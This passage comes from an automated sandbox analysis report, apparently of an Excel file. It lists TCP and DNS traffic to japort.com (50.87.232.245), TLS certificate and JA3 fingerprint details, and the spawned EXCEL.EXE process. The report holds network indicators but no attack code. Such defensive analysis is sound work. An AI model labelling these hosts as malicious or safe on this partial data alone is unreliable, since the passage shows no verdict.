Jan 25, 2021 10:23:35.094412088 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094438076 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094444990 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094476938 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094491005 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094527006 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094532013 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094572067 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094585896 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094613075 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094624043 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094655991 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094659090 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094693899 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094719887 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094732046 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094749928 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094773054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094779968 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094811916 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094825029 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094861031 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094861984 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094906092 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094916105 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094945908 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094959021 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.094984055 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.094999075 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095024109 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095031977 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095062017 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095086098 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095101118 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095108986 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095139980 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095155001 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095189095 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095208883 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095232964 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095240116 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095272064 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095299006 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095309973 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095323086 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095350981 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095367908 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095387936 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095403910 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095429897 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095444918 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095468044 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095480919 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095515966 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095523119 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095557928 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095573902 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095597029 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095613003 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095638037 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095647097 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095679045 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095695972 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095717907 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095731020 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095756054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095773935 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095793962 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095820904 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095840931 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095841885 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095885038 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095899105 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095926046 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095944881 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.095967054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.095988989 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096005917 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096020937 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096045971 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096065044 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096085072 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096090078 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096123934 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096142054 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096170902 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096177101 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096215010 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096229076 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096252918 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096281052 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096292019 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096302986 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096332073 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096345901 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096370935 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096395016 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096410036 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096415997 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096447945 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096463919 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096496105 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096497059 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096538067 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096555948 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096575022 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096591949 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096616983 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096625090 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096656084 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096671104 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096694946 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096704006 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096733093 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096750021 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096771002 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096788883 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096817970 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096834898 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096860886 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096868038 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096900940 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096915960 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096940994 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096951008 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.096980095 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.096995115 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097017050 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097029924 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097055912 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097070932 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097095013 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097109079 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097143888 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097148895 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097186089 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097220898 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097223043 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097248077 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097261906 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097270012 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097301006 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097325087 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097336054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097347975 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097376108 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097403049 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097423077 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097444057 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097481012 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097507954 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097520113 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.097526073 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.097573042 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255393982 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255441904 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255481005 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255480051 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255503893 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255520105 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255534887 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255558014 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255563974 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255595922 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255614042 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255633116 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255640030 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255676031 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255681992 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255724907 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255726099 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255763054 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255778074 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255800962 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255810976 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255839109 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255856037 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255877018 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255882025 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255916119 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255919933 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255954981 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.255970001 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.255999088 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256005049 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256047964 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256055117 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256087065 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256100893 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256127119 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256129980 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256165981 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256169081 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256205082 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256223917 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256242990 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256257057 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256282091 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256287098 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256325960 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256330013 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256371975 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256386995 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256409883 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256414890 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256448030 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256463051 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256486893 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256493092 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256522894 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256531000 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256561041 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256592035 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256598949 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256607056 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256638050 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256648064 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256691933 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256704092 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256728888 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256742954 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256767988 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256781101 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256808996 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256835938 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256841898 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.256855965 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.256892920 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.257318974 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:35.257373095 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.306530952 CET	49726	443	192.168.2.3	50.87.232.245
Jan 25, 2021 10:23:35.464435101 CET	443	49726	50.87.232.245	192.168.2.3
Jan 25, 2021 10:23:50.121462107 CET	49732	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:23:53.209090948 CET	49732	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:23:59.319216013 CET	49732	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:24:11.389790058 CET	49747	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:24:14.398281097 CET	49747	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:24:20.398782969 CET	49747	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:24:32.561499119 CET	49755	443	192.168.2.3	3.14.70.198
Jan 25, 2021 10:24:35.571873903 CET	49755	443	192.168.2.3	3.14.70.198
Jan 25, 2021 10:24:41.588016033 CET	49755	443	192.168.2.3	3.14.70.198
Jan 25, 2021 10:24:53.812453985 CET	49757	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:24:56.823688984 CET	49757	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:25:02.839782953 CET	49757	443	192.168.2.3	192.168.0.1
Jan 25, 2021 10:25:14.933722019 CET	49759	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:25:17.934817076 CET	49759	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:25:23.935389996 CET	49759	443	192.168.2.3	3.19.60.159
Jan 25, 2021 10:25:37.011631012 CET	49760	443	192.168.2.3	3.14.70.198
Jan 25, 2021 10:25:40.014753103 CET	49760	443	192.168.2.3	3.14.70.198

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 10:23:17.652827024 CET	60100	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:17.678745031 CET	53	60100	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:18.710175037 CET	53195	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:18.733675003 CET	53	53195	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:19.509645939 CET	50141	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:19.535758972 CET	53	50141	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:21.218935013 CET	53023	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:21.242017984 CET	53	53023	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:25.692101002 CET	49563	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:25.723529100 CET	53	49563	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:27.922821045 CET	51352	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:27.946186066 CET	53	51352	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:28.776576996 CET	59349	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:28.799781084 CET	53	59349	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:29.154397964 CET	57084	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:29.198488951 CET	53	57084	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:29.557542086 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:29.602792025 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:30.569367886 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:30.601056099 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:31.566653013 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:31.598356009 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:31.941112995 CET	57568	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.064635038 CET	50540	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.068098068 CET	53	57568	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:32.090655088 CET	53	50540	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:32.839071035 CET	54366	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:32.871134043 CET	53	54366	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:33.582461119 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:33.615036964 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:33.621869087 CET	53034	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:33.644891977 CET	53	53034	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:34.401454926 CET	57762	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:34.424726963 CET	53	57762	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:37.598787069 CET	58823	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:37.632719994 CET	53	58823	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:48.440037012 CET	55435	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:48.474277973 CET	53	55435	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:49.945501089 CET	50713	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:49.971278906 CET	53	50713	8.8.8.8	192.168.2.3
Jan 25, 2021 10:23:53.134165049 CET	56132	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:23:53.169868946 CET	53	56132	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:04.506521940 CET	58987	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:04.538395882 CET	53	58987	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:05.715949059 CET	56579	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:05.739253044 CET	53	56579	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:07.536834002 CET	60633	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:07.559916019 CET	53	60633	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:07.915107965 CET	61292	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:07.938407898 CET	53	61292	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:10.855686903 CET	63619	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:10.887474060 CET	53	63619	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:14.139369011 CET	64938	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:14.162503958 CET	53	64938	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:23.875736952 CET	61946	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:23.901622057 CET	53	61946	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:25.316063881 CET	64910	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:25.350987911 CET	53	64910	8.8.8.8	192.168.2.3
Jan 25, 2021 10:24:52.973000050 CET	52123	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:24:52.999141932 CET	53	52123	8.8.8.8	192.168.2.3
Jan 25, 2021 10:25:11.114424944 CET	56130	53	192.168.2.3	8.8.8.8
Jan 25, 2021 10:25:11.162878990 CET	53	56130	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 25, 2021 10:23:31.941112995 CET	192.168.2.3	8.8.8.8	0x900b	Standard query (0)	japort.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 25, 2021 10:23:32.068098068 CET	8.8.8.8	192.168.2.3	0x900b	No error (0)	japort.com		50.87.232.245	A (IP address)	IN (0x0001)
Jan 25, 2021 10:24:07.559916019 CET	8.8.8.8	192.168.2.3	0x9a90	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 25, 2021 10:23:32.390734911 CET	50.87.232.245	443	192.168.2.3	49722	CN=cpanel.japort.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Mon Dec 14 09:07:11 CET 2020 Wed Oct 07 21:21:40 CEST 2020	Sun Mar 14 09:07:11 CET 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Jan 25, 2021 10:23:32.390734911 CET	50.87.232.245	443	192.168.2.3	49722	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 4640 Parent PID: 792

General

Start time:	10:23:27
Start date:	25/01/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x8e0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

